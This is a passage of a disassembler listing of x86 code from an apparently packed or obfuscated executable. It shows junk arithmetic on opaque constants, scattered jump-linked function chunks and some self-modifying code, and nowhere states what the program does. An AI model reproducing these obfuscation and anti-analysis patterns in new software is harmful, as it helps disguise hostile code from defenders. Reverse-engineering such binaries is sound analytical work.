		xchg	ebx, [esp+4+var_4]
		call	sub_43C206
		mov	eax, 934299CDh
		jmp	loc_4473D1
sub_4471DC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_4471FB:				; CODE XREF: sub_45AD42-F202j
		mov	[edi], ebx
		push	0A5DEEE4Dh

loc_447202:				; CODE XREF: sub_45AD42:loc_4441A0j
		call	nullsub_13
		retn
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------

loc_447208:				; CODE XREF: k2vbe3.d:loc_4537B7j
		push	esi
		push	6C50CB6Bh
		pop	esi
		jmp	loc_444022
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_447214:				; CODE XREF: sub_44A7C2+4008j
		not	esi

loc_447216:				; CODE XREF: sub_4461D5:loc_458425j
		push	0C7D19931h
		pop	eax
		and	eax, ds:4000F2h
		jmp	loc_449B86
; END OF FUNCTION CHUNK	FOR sub_44A7C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED1F

loc_447227:				; CODE XREF: sub_43ED1F+Aj
		mov	eax, [esp+0]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		jmp	loc_45BA0A
; END OF FUNCTION CHUNK	FOR sub_43ED1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_447235:				; CODE XREF: sub_45101A:loc_44D9F3j
		jz	loc_443A7E
		jmp	loc_449E2B
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C4

loc_447240:				; CODE XREF: sub_4545C4:loc_45174Fj
		push	edi
		mov	edi, edx
		xchg	edi, [esp+8+var_8]
		call	sub_444B3E
		mov	eax, 0EEE68DF1h
		jmp	loc_45B7A4
; END OF FUNCTION CHUNK	FOR sub_4545C4
; ---------------------------------------------------------------------------

loc_447255:				; CODE XREF: k2vbe3.d:0043E0B8j
		pop	ebx
		jmp	sub_44C90E
; ---------------------------------------------------------------------------

locret_44725B:				; CODE XREF: k2vbe3.d:loc_442400j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_44725C:				; CODE XREF: sub_44B359+194Bj
		jmp	loc_44CBD1
; END OF FUNCTION CHUNK	FOR sub_44B359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_447261:				; CODE XREF: sub_4481FA+6FEj
		jmp	loc_44ABE9
; END OF FUNCTION CHUNK	FOR sub_4481FA

; =============== S U B	R O U T	I N E =======================================



sub_447266	proc near		; DATA XREF: sub_4462E0+2o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FCF6 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043FF29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004490DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044947A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044C143 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451343 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A910 SIZE 00000018 BYTES

		push	74B6ABB3h
		pop	ebx
		and	ebx, 922DA881h
		xor	ebx, ds:4000F1h
		cmp	ebx, 3BA0B3CAh
		jmp	loc_43FF29
sub_447266	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_447283:				; CODE XREF: sub_446E24:loc_444C78j
		jns	nullsub_214

loc_447289:				; CODE XREF: sub_446E24:loc_454FD8j
		push	offset sub_45995B
		jmp	loc_454ACA
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
		jz	loc_43CBE3
		sbb	ebx, eax
		jmp	sub_448834
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_4472A0:				; CODE XREF: sub_458F1C+Aj
		push	esi
		mov	esi, edx
		push	offset sub_44A7CD
		jmp	nullsub_302
; END OF FUNCTION CHUNK	FOR sub_458F1C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_4472AE:				; CODE XREF: sub_458F1C-16CC1j
		add	esi, 6573DF2Bh
		mov	[esi], eax
		pop	esi
		lea	eax, sub_458F1C
		jmp	loc_452A91
; END OF FUNCTION CHUNK	FOR sub_458F1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4472C2:				; CODE XREF: sub_44C90E+970Bj
		xchg	ebp, eax

loc_4472C4:				; CODE XREF: sub_44C90E:loc_448567j
		cmp	dword ptr [ebp-108h], 6C436E6Fh
		jnz	loc_459FE1
		jmp	loc_453335
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_4472D9	proc near		; DATA XREF: sub_44128B+1AE2Ao

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00444B75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446DDC SIZE 00000017 BYTES

		push	eax
		push	9389554Ch
		pop	eax
		sub	eax, 0D621FA22h
		or	eax, 4CAC0EF4h
		jmp	loc_444B75
sub_4472D9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_4472F1:				; CODE XREF: sub_443BDF+1D3j
					; sub_443BDF:loc_4532B7j
		add	eax, 0BC131FD8h
		test	eax, 2000h
		jmp	loc_44692E
; END OF FUNCTION CHUNK	FOR sub_443BDF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447303:				; CODE XREF: k2vbe3.d:00455BDEj
		jmp	loc_448ED8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_447308:				; CODE XREF: sub_45512F-4048j
		ror	eax, 0Ah
		sub	eax, 0AA42966Fh
		call	sub_45BC98
; END OF FUNCTION CHUNK	FOR sub_45512F
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_447316:				; CODE XREF: sub_44A6BD-C77Fj
		jmp	loc_43CA8F
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------

loc_44731B:				; CODE XREF: k2vbe3.d:0044F0F9j
		and	edx, 5CFA4F0Fh
		rol	edx, 0Ch
		add	edx, 7B54321Fh
		push	offset sub_44E66B
		jmp	loc_45ADA9
; ---------------------------------------------------------------------------
		js	loc_44B16B
		jmp	sub_44529A
; ---------------------------------------------------------------------------
		and	edi, 0DC376C97h
		jmp	loc_4517AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_44734A:				; CODE XREF: sub_444B3E:loc_43F49Fj
		jnz	loc_45596E
		jmp	loc_44015E
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_447355:				; CODE XREF: sub_4479A1:loc_442D9Fj
		mov	eax, [eax+4]
		push	offset sub_44F028
		jmp	loc_43D745
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500BB

loc_447362:				; CODE XREF: sub_4500BB+Fj
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jz	loc_44F07C
		sub	al, 99h
		jmp	loc_45AEDD
; END OF FUNCTION CHUNK	FOR sub_4500BB
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_43DC9D
; ---------------------------------------------------------------------------

loc_44737D:				; CODE XREF: k2vbe3.d:004422FFj
		jp	loc_44BC99

; =============== S U B	R O U T	I N E =======================================



sub_447383	proc near		; CODE XREF: sub_44990B:loc_43FB64p

; FUNCTION CHUNK AT 0044035E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004405DE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447552 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451739 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	72C91D5Ah
		jmp	loc_451739
sub_447383	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0B7h, 1Eh, 7Bh
dword_447394	dd 0			; DATA XREF: k2vbe3.d:loc_443A45r
					; k2vbe3.d:00448B3Dr
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_447398:				; CODE XREF: sub_44B2D7:loc_44F99Aj
		jmp	loc_4520D8
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
		db 0B9h, 1Ch, 43h
; ---------------------------------------------------------------------------
		test	eax, 13318A90h	; DATA XREF: sub_44945C+8265o
					; sub_45370Bo
		cdq
		xchg	eax, ecx
		pop	esp
		enter	36D8h, 0

loc_4473AC:				; CODE XREF: k2vbe3.d:0045789Cj
		jmp	loc_452CEA
; ---------------------------------------------------------------------------
		call	sub_45B4A2

loc_4473B6:				; DATA XREF: sub_444297:loc_44AED6o
		mov	eax, [ebp-0Ch]
		push	eax
		push	ebp
		push	offset loc_43D137
		jmp	locret_45B760
; ---------------------------------------------------------------------------

locret_4473C5:				; CODE XREF: k2vbe3.d:loc_45B1A2j
		retn
; ---------------------------------------------------------------------------

loc_4473C6:				; CODE XREF: k2vbe3.d:00457311j
		jmp	loc_449DF9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4473CB:				; CODE XREF: sub_44B2D7+68CEj
					; sub_44B2D7:loc_4520D8j
		call	nullsub_6
		retn
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471DC

loc_4473D1:				; CODE XREF: sub_4471DC+1Aj
		jmp	loc_44137C
; END OF FUNCTION CHUNK	FOR sub_4471DC
; ---------------------------------------------------------------------------

loc_4473D6:				; CODE XREF: k2vbe3.d:0044537Fj
		jmp	loc_4555EE
; ---------------------------------------------------------------------------

loc_4473DB:				; CODE XREF: k2vbe3.d:004435EFj
		jmp	loc_458B5C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4473E1:				; CODE XREF: sub_44B2D7+46BDj
		call	sub_43C04E
		jmp	loc_43EE16
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_4473EB:				; CODE XREF: sub_43E470:loc_43CE49j
		add	eax, 4
		mov	ebp, [eax]
		add	eax, 4
		mov	edx, [eax]
		jmp	loc_459A91
; END OF FUNCTION CHUNK	FOR sub_43E470
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A39

loc_4473FA:				; CODE XREF: sub_451A39-13A30j
		jnz	loc_44FE57

loc_447400:				; CODE XREF: k2vbe3.d:00457FE7j
		jmp	loc_458AF0
; END OF FUNCTION CHUNK	FOR sub_451A39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1C4

loc_447405:				; CODE XREF: sub_44F1C4+1FC5j
		jmp	loc_4585A8
; END OF FUNCTION CHUNK	FOR sub_44F1C4
; ---------------------------------------------------------------------------
		pop	edx
		sbb	edi, eax
		adc	ebp, 996EA2Eh
		jmp	loc_44FE57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_447418:				; CODE XREF: sub_4597AE:loc_45809Dj
		jge	loc_4436B2

loc_44741E:				; CODE XREF: sub_45597D+3j
		jmp	loc_44BF8C
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4402FA

loc_447423:				; CODE XREF: sub_4402FA+110D0j
		jmp	loc_450930
; END OF FUNCTION CHUNK	FOR sub_4402FA
; ---------------------------------------------------------------------------

loc_447428:				; CODE XREF: k2vbe3.d:0044FD4Aj
		jmp	loc_457D7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E39D

loc_44742D:				; CODE XREF: sub_44E39D+Aj
		jmp	loc_457801
; END OF FUNCTION CHUNK	FOR sub_44E39D
; ---------------------------------------------------------------------------
		cmp	ebp, edx
		jmp	loc_454371
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C233

loc_447439:				; CODE XREF: sub_45C233+11j
		xchg	eax, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_45C233
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_44743C:				; CODE XREF: sub_43D823:loc_44462Dj
		push	0BD045806h
		pop	edi
		and	edi, 0C7B855ACh
		rol	edi, 1
		xor	edi, 0DFD34EEEh
		jmp	loc_443BC1
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
		sbb	ecx, ebx
		jmp	loc_44558D
; ---------------------------------------------------------------------------

loc_44745C:				; DATA XREF: sub_4597AE:loc_449410o
		cdq
		add	eax, [esp]
		adc	edx, [esp+4]
		add	esp, 8
		mov	[ebp-4], eax
		jmp	loc_43FA27

; =============== S U B	R O U T	I N E =======================================



sub_44746F	proc near		; CODE XREF: sub_44B94B-67E1p
					; sub_44B94B+6C3p

; FUNCTION CHUNK AT 0045C373 SIZE 00000018 BYTES

		push	ebp
		jmp	loc_45C373
sub_44746F	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_447476:				; CODE XREF: sub_4424CF+F4C3j
		jmp	nullsub_153
; END OF FUNCTION CHUNK	FOR sub_4424CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_481. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44747C:				; CODE XREF: sub_456666+11FAj
		jmp	nullsub_291
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_447481:				; CODE XREF: sub_44A6BD:loc_441572j
		jz	loc_446332

loc_447487:				; CODE XREF: sub_44B979-B24Dj
		jmp	loc_45AE27
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
		adc	edx, 800D9194h
		jmp	loc_4509F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_447497:				; CODE XREF: sub_43DEBE:loc_43C39Aj
		test	esi, 20000h
		jmp	loc_443CCB
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
		push	ecx
		call	sub_45A1CB

loc_4474A8:				; CODE XREF: k2vbe3.d:00440232j
		jge	sub_44B15C
		or	esi, 0ADDF6D89h
		jmp	loc_43D7B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44455F

loc_4474B9:				; CODE XREF: sub_44455F+Dj
		xor	eax, 5FBA6BA4h
; END OF FUNCTION CHUNK	FOR sub_44455F
; START	OF FUNCTION CHUNK FOR sub_44A56B

loc_4474BF:				; CODE XREF: sub_44A56B:loc_455321j
		rol	eax, 15h
		push	edi
		push	99A804A2h
		pop	edi
		jmp	loc_449783
; END OF FUNCTION CHUNK	FOR sub_44A56B
; ---------------------------------------------------------------------------
		push	0D12237D6h
		jmp	loc_43CF61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_4474D8:				; CODE XREF: sub_4479A1+74Cj
		mov	[ebp+var_801], 1

loc_4474DF:				; CODE XREF: sub_44ED3C:loc_44C3D2j
		push	97B4CA24h
		pop	eax
		add	eax, 94F5D3A6h
		xor	eax, 0A1F66974h
		add	eax, ebp
		jmp	loc_447156
; END OF FUNCTION CHUNK	FOR sub_4479A1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_436. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4474F9	proc near		; DATA XREF: k2vbe3.d:0044D35Eo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00456E91 SIZE 00000023 BYTES

		xchg	esi, [esp+0]
		call	sub_43E0F5
		push	ebx
		push	0E83A953Ch
		pop	ebx
		jmp	loc_456E91
sub_4474F9	endp

; ---------------------------------------------------------------------------

loc_44750D:				; CODE XREF: k2vbe3.d:00452E72j
		sbb	edi, eax
		xchg	ecx, edx
; START	OF FUNCTION CHUNK FOR sub_4570A3

loc_447511:				; CODE XREF: sub_4570A3:loc_44CB75j
		and	edi, 666D6B79h
		push	0B04D13A6h

loc_44751C:				; CODE XREF: k2vbe3.d:loc_452E66j
		add	ebx, 86449F19h
; END OF FUNCTION CHUNK	FOR sub_4570A3
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_447522:				; CODE XREF: sub_45A323-B571j
		xchg	ebx, [esp+10h+var_10]
		jmp	loc_44233A
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44752A:				; CODE XREF: sub_443FC1:loc_45BBF2j
		call	sub_4553CC
		rol	eax, 6
		push	ecx
		push	offset sub_440E71
		jmp	nullsub_437
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518A6

loc_44753D:				; CODE XREF: sub_4518A6-5851j
		pop	edx
		and	edx, 7CBE4C23h
		add	edx, 0AFA907D0h
		xchg	edx, [esp-4+arg_0]
		jmp	sub_44E481
; END OF FUNCTION CHUNK	FOR sub_4518A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447383

loc_447552:				; CODE XREF: sub_447383:loc_451739j
		pop	eax
		and	eax, 8FE9E44Fh
		or	eax, 39B2F003h
		rol	eax, 0Fh
		jmp	loc_44035E
; END OF FUNCTION CHUNK	FOR sub_447383
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585F2

loc_447568:				; CODE XREF: sub_4585F2+9j
		jmp	loc_44011D
; END OF FUNCTION CHUNK	FOR sub_4585F2
; ---------------------------------------------------------------------------

loc_44756D:				; CODE XREF: k2vbe3.d:0043E605j
		jmp	loc_443BB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_447572:				; CODE XREF: sub_44B999+2E42j
		jz	loc_44C9FA
		jmp	loc_44D921
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D345

loc_44757D:				; CODE XREF: sub_44D345-9650j
					; sub_44D345+CEA6j
		inc	[ebp+var_4]
		jmp	loc_44D34E
; END OF FUNCTION CHUNK	FOR sub_44D345

; =============== S U B	R O U T	I N E =======================================



sub_447585	proc near		; CODE XREF: sub_44F20A+7656p

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043F865 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044F89F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455449 SIZE 00000005 BYTES

		call	sub_450158
		push	ecx
		mov	ecx, [esp+4+arg_8]
		jmp	loc_455449
sub_447585	endp


; =============== S U B	R O U T	I N E =======================================



sub_447594	proc near		; DATA XREF: sub_45000F-D838o

; FUNCTION CHUNK AT 0044A627 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044B3D2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044BDEA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044EF12 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450E31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452965 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454B05 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459E72 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A2D2 SIZE 00000012 BYTES

		pop	esi
		rol	eax, 19h
		xor	eax, 1DD83584h
		push	ebx
		jmp	loc_450E31
sub_447594	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C1A

loc_4475A4:				; CODE XREF: sub_448C1A+Cj
		cmp	eax, 0FFFFFFFFh
		jz	loc_4475B4
		mov	eax, [eax]
		jmp	loc_44FF06
; END OF FUNCTION CHUNK	FOR sub_448C1A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_4475B4:				; CODE XREF: sub_43FE2A+31BAj
					; sub_448C1A-1673j ...
		xor	ebx, ebx

loc_4475B6:				; CODE XREF: k2vbe3.d:0043D395j
					; k2vbe3.d:00442FD6j
		mov	eax, ebx
		pop	ecx

loc_4475B9:				; CODE XREF: k2vbe3.d:0044C518j
		jmp	loc_440597
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A42

loc_4475BE:				; CODE XREF: sub_4572F6-68C6j
					; sub_457A42:loc_454664j
		push	eax
		push	2CF7D3DEh
		pop	eax
		add	eax, 7B12C44Bh
		push	offset loc_44B529
		jmp	sub_45739F
; END OF FUNCTION CHUNK	FOR sub_457A42

; =============== S U B	R O U T	I N E =======================================



sub_4475D5	proc near		; CODE XREF: k2vbe3.d:0043E40Fj
					; sub_446CCF+9C21p

; FUNCTION CHUNK AT 004452E1 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044A133 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004523A3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00457F0F SIZE 00000004 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_448D3A
		mov	[ebp-4], eax

loc_4475E1:				; CODE XREF: sub_459216:loc_441E80j
					; sub_446CCF+9C14j ...
		mov	eax, [ebp-1Ch]
		call	sub_448DD4

loc_4475E9:				; CODE XREF: k2vbe3.d:0044A8F8j
		jmp	loc_4523A3
sub_4475D5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		and	esi, 8C0CCB6h
		jmp	sub_451EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_4475F9:				; CODE XREF: sub_44D0D5:loc_45A4EDj
		and	eax, 74A18E4Ah
		jmp	loc_44ADB2
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_447604:				; CODE XREF: sub_4523BE-119A3j
		push	1D53FFBDh
		pop	eax
		rol	eax, 0Bh
		xor	eax, 0F91D09CBh
		or	eax, 8E23C7D5h
		test	eax, 4
		jmp	loc_447789
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D2E

loc_447624:				; CODE XREF: sub_447D2E:loc_43C43Dj
		and	ebx, 905D289Ah
		add	ebx, 6FE76738h
		xchg	ebx, [esp+0]
		jmp	loc_459B5C
; END OF FUNCTION CHUNK	FOR sub_447D2E
; ---------------------------------------------------------------------------
		jns	loc_43D2C3
		jmp	sub_44CE6C
; ---------------------------------------------------------------------------
		ror	ebx, 12h

loc_447646:				; CODE XREF: k2vbe3.d:loc_449E59j
		jmp	sub_459A9E
; ---------------------------------------------------------------------------

loc_44764B:				; CODE XREF: k2vbe3.d:004486C4j
		add	ebp, 0F284DA4Dh
		jmp	loc_44CD18
; ---------------------------------------------------------------------------

loc_447656:				; DATA XREF: sub_45485B-17F84o
		lea	eax, sub_457F1C
		mov	byte ptr [eax],	0C3h
		jmp	loc_450164

; =============== S U B	R O U T	I N E =======================================



sub_447664	proc near		; CODE XREF: sub_41B3E7+5B4p
					; k2vbe3.d:00458584j
					; DATA XREF: ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043ED67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004400EE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441C5A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00442543 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004446A7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445EA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446E0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448AB0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044A08C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044AE8B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BA98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BFE0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044CA63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450DD2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450DE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454402 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E5B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458570 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045858F SIZE 0000000C BYTES

		push	ebx
		push	0F651C9C7h
		xchg	ecx, [esp+0]
		jmp	loc_44BA98
sub_447664	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_447672:				; CODE XREF: k2vbe3.d:0045377Fj
		xchg	eax, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_453347
		retn
; ---------------------------------------------------------------------------
		db 24h
dword_447684	dd 0			; DATA XREF: sub_44BDBB+6r
					; sub_44BDBB:loc_4578A1r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAA0

loc_447688:				; CODE XREF: sub_44DAA0+Fj
		jmp	nullsub_462
; END OF FUNCTION CHUNK	FOR sub_44DAA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_44768D:				; CODE XREF: sub_44D59D-AA4Fj
		jmp	loc_4421F4
; END OF FUNCTION CHUNK	FOR sub_44D59D

; =============== S U B	R O U T	I N E =======================================



sub_447692	proc near		; CODE XREF: sub_417ADF+52p
					; DATA XREF: zcrshv4o:off_41E00Co

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C021 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043C7C7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043CB45 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043D4FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA8F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043F4D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442CB3 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00444430 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444984 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044996D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A3D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A9E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AC0E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B4BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B50B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C02C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044DAEE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452F47 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456536 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457769 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A527 SIZE 0000000A BYTES

		jz	loc_44C02C
		jmp	loc_43D4FB
sub_447692	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_44769D:				; CODE XREF: sub_448DD4+12FE2j
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_452C93
		mov	eax, [ebp-4]
		add	eax, 3Ch
		jmp	loc_43F3F2
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4541D3

loc_4476B5:				; CODE XREF: sub_4541D3:loc_449625j
		mov	eax, [eax]
		push	offset loc_4538FB
		jmp	nullsub_226
; END OF FUNCTION CHUNK	FOR sub_4541D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_4476C1:				; CODE XREF: sub_43C82E+C586j
		popf
		rol	ebx, 0Dh
		xchg	esi, [ebx]

loc_4476C7:				; CODE XREF: sub_43C82E:loc_43C759j
		push	eax
		lea	eax, loc_451743+1
		push	offset loc_446EA6
		jmp	loc_44D8A5
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------

loc_4476D8:				; CODE XREF: k2vbe3.d:loc_443E12j
		jg	loc_449D25
		push	0EBCF0DE9h
		jg	loc_4526FB
		ja	loc_4478BC
		jmp	loc_44C27C
; ---------------------------------------------------------------------------

loc_4476F4:				; DATA XREF: sub_444B3E:loc_44B7B6o
